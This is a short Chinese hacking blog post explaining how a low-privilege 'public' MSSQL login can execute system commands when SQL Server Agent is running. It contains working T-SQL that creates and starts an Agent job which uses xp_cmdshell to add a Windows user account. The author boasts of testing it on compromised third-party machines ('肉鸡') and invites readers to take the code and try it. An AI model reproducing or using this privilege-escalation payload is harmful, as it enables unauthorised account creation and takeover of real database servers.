关于public权限执行系统命令 's

作者：伤心的鱼[BCT]
鬼仔's Blog（ http://www.huaidan.org/blog/ ）首发，转载请注明。

最早1986提出的access数据库执行系统命令，结果忽悠了一圈人 哈哈 不过这个public权限执行系统命令也算是个鸡肋…. YY 一下 安慰一下被我忽悠的同志们

很多朋友说public权限不能执行命令 其实是可以执行的~ 但是前提是启动 Sql server Agent 服务

其实SQL Server Agent 是一个任务规划器和警报管理器 默认安装 sql server是不开启的
不过我上午测试十个肉鸡成功了三四次。 看来有的管理员还是需要这个东西来提供报警的

其实就是利用MSSQL的作业处理也是可以执行命令 [email protected]_name要指定你的sql的服务器名

SQL Server Agent 这服务必须开启

开启服务后进入查询分析器. 这里我是用新建的public用户

首先 Select host_name() 获取当前库服务器机器名
然后在查询分析器执行下面的代码

USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "net user iisloger hook ./add> c:/fish.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = '这里是你的SQL服务器名'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'

以上代码就很明显了 直接net user了一个iisloger的用户 群里的N个人都被我忽悠了 不过这个确实是public权限可以加用户 但是前提条件确是…. XXXX
哈哈 不多说了直接拿去测试好了 也算是一种思路吧 没事就去疯鱼群里扯淡哈